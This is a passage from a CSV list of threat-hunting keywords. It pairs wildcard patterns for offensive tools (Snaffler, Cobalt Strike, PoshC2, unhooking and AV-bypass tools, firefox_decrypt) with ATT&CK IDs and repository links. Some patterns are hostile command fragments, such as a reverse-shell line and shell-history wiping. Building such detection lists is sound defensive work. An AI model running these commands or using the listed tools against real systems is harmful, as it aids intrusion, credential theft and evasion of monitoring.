- T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - 
T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" 
+"*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBETEwgUGF0aA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBETEwgVVJJ*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Un1k0d3r/SCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*uname -a* w* id* /bin/bash -i*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*uname=FUZZ&pass=FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Unblock-File .\install.ps1*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Unconstrained_Delegation_Systems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Und3rf10w*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Und3rf10w","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*unDefender-master*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*undertheradar-main*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*unexpected bytes remain after decoding*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unexpected internal error*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unhide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - 
T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*unhook kernel32*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*unhook wldp amsi*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*UnhookingKnownDlls.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*UnhookingNtdll_disk.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*UnhookingPatch-main*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*UniByAv*","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. 
The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","3","239","67","2018-10-26T15:25:26Z","2017-08-15T21:57:15Z" +"*unicorn.py *","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*unicorn-master.zip*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*unixpickle*","offensive_tool_keyword","Github Username","github repo hosting obfuscation tools","N/A","N/A","N/A","N/A","Defense Evasion","https://github.com/unixpickle","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*unknown or unsupported key type*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" 
+"*unkvolism/Fuck-Etw*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*unmanagedPowershell */command*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*unmarshal_cmd_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*unode/firefox_decrypt*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*UnquotedPath.csproj*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*UnquotedPath.exe*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*unset 
HISTFILE*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*unset HISTFILE*","greyware_tool_keyword","unset","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*unshackle --*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 